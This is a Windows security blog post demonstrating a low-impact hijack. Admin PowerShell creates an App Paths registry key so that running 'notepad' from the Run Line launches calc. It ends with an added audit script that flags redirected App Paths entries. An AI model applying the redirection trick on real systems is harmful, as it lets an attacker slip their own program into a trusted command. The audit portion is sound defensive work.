Silly Attack Using Run Line

source link: https://parsiya.net/blog/2017-10-26-silly-attack-using-run-line/

Oct 26, 2017 - 2 minute read - Comments - Windows

Previously we saw that the Windows Run Line searches the App Paths registry keys before PATH. We can perform a silly attack: create an App Paths key for an application that is in PATH and point it at another command.

This is a silly attack because we need to be admin to create or edit those keys. But if you ever find yourself in that unlikely situation, you can use it to become delayed admin (i.e. wait for an admin to run the app via the Run Line).

This also serves as a tutorial note on using PowerShell to list and manipulate the registry.

Let's pick notepad, which is in PATH, and point it to calc. Open an admin PowerShell prompt.

First check whether the key exists (note that we have tab auto-complete inside the registry):

# notepad does not have an entry
$ Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe"
False
# chrome does
$ Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe"
True

Now create the key and set the default property:

# the trailing backtick continues the command on the next line
$ New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" `
        -Name notepad.exe -Value "C:\Windows\System32\calc.exe"

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

SKC  VC Name                           Property
---  -- ----                           --------
  0   1 notepad.exe                    {(default)}

We could also have set the default value later using Set-Item:

$ Set-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe" `
           -Value "C:\Windows\System32\calc.exe"

To create new properties, use New-ItemProperty. For example, the Path property contains the working directory:

$ New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe" `
                   -Name Path -Value "C:\Windows\System32\"

PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
               \Windows\CurrentVersion\App Paths\notepad.exe
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
               \Windows\CurrentVersion\App Paths
PSChildName  : notepad.exe
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry
Path         : C:\Windows\System32\

ls/gci/Get-ChildItem list only registry keys, not their properties.

$ ls -path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\"
    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

SKC  VC Name                           Property
---  -- ----                           --------
  0   2 chrome.exe                     {(default), Path}
  0   2 notepad.exe                    {(default), Path}

# notepad.exe has no subkeys, so nothing is listed
$ ls -path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe"

We have to get each property one by one (or use a PowerShell script that calls $Key.GetValueNames() and iterates over the names).

Now open the Run Line and enter notepad to see calc pop up.

Silly attack, because only admins can edit those registry keys.
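The flip side of this trick is the audit: since ls does not show properties, a defender who wants to spot an App Paths key that has been pointed at a different binary has to read the values via GetValueNames()/GetValue(), as hinted above. The script below is an added example, not code from the original post. It walks both the HKLM and HKCU App Paths hives and flags every key whose (default) value resolves to an executable with a different file name than the key itself (for instance a notepad.exe key whose target is calc.exe). The function name Get-AppPathsAudit and the Suspicious flag are my own; reading these keys does not require an elevated prompt.

```powershell
# Added example (not from the original post): list every App Paths entry with
# its properties and flag key-name/target-name mismatches for review.
function Get-AppPathsAudit {
    $roots = @(
        "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths",
        "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths"
    )
    foreach ($root in $roots) {
        if (-not (Test-Path -Path $root)) { continue }
        # Get-ChildItem returns RegistryKey objects; GetValueNames() exposes
        # the properties that ls/gci leave out.
        foreach ($key in Get-ChildItem -Path $root) {
            $valueNames = $key.GetValueNames() | ForEach-Object {
                if ($_ -eq "") { "(default)" } else { $_ }   # "" is (default)
            }
            $target  = $key.GetValue("")      # command the Run Line will launch
            $workDir = $key.GetValue("Path")  # optional working directory
            $targetName = $null
            if ($target) {
                # Strip surrounding quotes; GetValue already expands %VARS%.
                $targetName = [System.IO.Path]::GetFileName($target.Trim('"'))
            }
            # -ne on strings is case-insensitive in PowerShell, so NOTEPAD.EXE
            # pointing at notepad.exe is not flagged.
            $mismatch = ($null -ne $targetName) -and
                        ($targetName -ne $key.PSChildName)
            [PSCustomObject]@{
                Hive       = $key.PSDrive.Name
                Key        = $key.PSChildName
                Target     = $target
                WorkingDir = $workDir
                Values     = ($valueNames -join ", ")
                Suspicious = $mismatch
            }
        }
    }
}

# Full inventory first, then only the entries worth a closer look.
$audit = Get-AppPathsAudit
$audit | Format-Table -AutoSize
$audit | Where-Object Suspicious | Format-List
```

A mismatch is a prompt for review, not proof of tampering: some vendors legitimately register a key under one name and point it at a differently named launcher, so compare flagged entries against a known-good baseline.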

Posted by Parsia Oct 26, 2017 Tags: Run Line
